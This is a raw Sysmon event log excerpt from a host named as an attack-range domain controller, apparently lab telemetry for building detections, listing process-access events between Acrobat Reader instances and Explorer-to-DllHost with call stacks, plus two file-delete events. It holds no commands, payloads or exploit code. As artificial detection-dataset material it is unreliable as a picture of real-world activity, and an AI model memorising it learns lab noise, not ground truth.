DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047573Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.908{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047572Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.861{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047571Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.861{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047570Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.814{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047569Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.814{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047568Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.767{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047567Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.767{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047566Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.720{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047565Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.720{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000047564Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.663{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B424AFBB2EBD651CE6511D9CD487FE2C,SHA256=70456803B07167A55C1E8597CF78E5C4A4D3BD7E59A0A8BF24709E559361AD93,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047563Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.647{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047562Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.647{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047561Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.647{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047560Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.632{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047559Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.632{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047558Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.632{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047557Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.632{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047556Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.632{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000047555Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.632{FE4C2B44-D9F5-63C7-1100-00000000AF02}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=5A40CA2B0BAB40EE1EDBE4798C52C7FC,SHA256=D3B6B1CE2852A530B9E6DEA9A157EEE546B3B8C5FB9E8A1FDB469819ABC854D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047554Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:26.584{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E65F-63C7-9206-00000000AF02}6672C:\Windows\SysWOW64\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047553Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 